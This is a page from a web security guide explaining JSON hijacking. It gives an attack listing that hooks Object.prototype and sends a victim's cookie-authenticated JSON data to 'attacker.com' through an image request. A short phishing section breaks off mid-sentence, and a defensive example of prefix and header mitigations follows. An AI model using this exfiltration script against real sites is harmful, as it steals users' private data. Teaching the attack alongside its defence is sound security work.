Web application security - the fast guide 1.1 | Page 103

Chapter 5 - Attack Execution the client

The victim opens the link, which sends a request to the attacker's website. That site serves a page containing the following script:

    // Define a setter on Object.prototype for the property "name". When the
    // browser evaluates the JSON response as script and an object in it
    // assigns "name", this function runs with the value being assigned.
    Object.prototype.__defineSetter__("name", function(x) {
        var s = "";
        // collect every property already set on the object under construction
        for (var f in this) {
            s += f + ": '" + this[f] + "', ";
        }
        s += "name: " + x;
        // send information to the attacker's server
        document.images[0].src = "http://attacker.com/?data=" + s;
    });

The previous listing defines a setter and so enables the information requested by the browser from the JSON service to be sent to the attacker's server. This attack is only valid if the user is authenticated by a cookie to the server hosting the JSON service, because the browser attaches that cookie automatically when the attacker's page includes the JSON URL.

5.15 Attack Execute - Phishing BRAND

Phishing falls under the category of trickery attacks. It depends mainly on faking a representation of a website or impersonating the company through an email message. The attacker usually uses the original company theme and logo images to convince the victim that the message comes from a legitimate company email address. To avoid being caught, the attacker uses a compromised machine and a forged sender address.

Attack requirement:

A. vict
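The following is an added example, not code from the book, showing the two server-side mitigations for the JSON hijacking listing above: rejecting requests that a cross-site script tag could have produced, and prefixing the JSON body so it cannot be evaluated as script. The API path, the `X-Requested-With` check and the sample contact records are assumptions made for the demonstration; the `)]}',\n` prefix is the one AngularJS popularised.

```javascript
// Added example (not from the book): mitigating JSON hijacking of a
// cookie-authenticated JSON service. Assumed setup: a hypothetical endpoint
// returning an array of contact records, intended only for the site's own
// XMLHttpRequest code, never for cross-site <script src=...> inclusion.

// Anti-hijacking prefix. A browser that loads the response as a script hits
// a syntax error before any array element is built, so no inherited setter
// on Object.prototype ever sees the data.
const JSON_PREFIX = ")]}',\n";

// Constructed sample data standing in for the JSON service's real response.
const SAMPLE_CONTACTS = [
  { name: 'alice', email: 'alice@example.test' },
  { name: 'bob', email: 'bob@example.test' },
];

// Server side: refuse requests that a <script> tag could have made (a plain
// GET carrying only the ambient cookie, no custom header), then serialise
// the payload behind the prefix. `req` is a minimal request-like object.
function serveJson(req, data) {
  if (req.method !== 'GET' && req.method !== 'POST') {
    return { status: 405, body: '' };
  }
  // Browsers never add X-Requested-With to a <script src> fetch; only the
  // site's own XHR/fetch code can set it, and cross-origin senders would
  // need CORS preflight approval first.
  if (req.headers['x-requested-with'] !== 'XMLHttpRequest') {
    return { status: 403, body: 'cross-site script inclusion blocked' };
  }
  return {
    status: 200,
    headers: { 'Content-Type': 'application/json; charset=utf-8' },
    body: JSON_PREFIX + JSON.stringify(data),
  };
}

// Client side (the site's own code): strip the prefix, then use JSON.parse,
// which builds objects without executing anything and without invoking
// setters defined on Object.prototype.
function parseProtectedJson(text) {
  if (!text.startsWith(JSON_PREFIX)) {
    throw new Error('missing anti-hijacking prefix');
  }
  return JSON.parse(text.slice(JSON_PREFIX.length));
}

// Demonstration helper: simulate what a cross-site <script src> inclusion
// does, namely evaluate the body as script. Returns true when the engine
// rejects the body with a SyntaxError, i.e. the prefix did its job.
function prefixedBodyIsUnrunnable(body) {
  try {
    new Function(body);
    return false;
  } catch (e) {
    return e instanceof SyntaxError;
  }
}

// Walk-through of both paths.
const legit = serveJson(
  { method: 'GET', headers: { 'x-requested-with': 'XMLHttpRequest' } },
  SAMPLE_CONTACTS
);
const crossSite = serveJson({ method: 'GET', headers: {} }, SAMPLE_CONTACTS);
console.log(legit.status, parseProtectedJson(legit.body).length); // 200 2
console.log(crossSite.status);                                     // 403
console.log(prefixedBodyIsUnrunnable(legit.body));                 // true
```

Either mitigation alone defeats the setter trick; using both also protects the top-level array from older script-inclusion attacks that did not rely on setters. Note that engines implementing ES5 or later create object-literal properties with define semantics, so the `__defineSetter__` listing above only fires in the older browsers it was written for, but the server-side fixes remain the robust answer because the JSON would otherwise still be fetched with the victim's cookie.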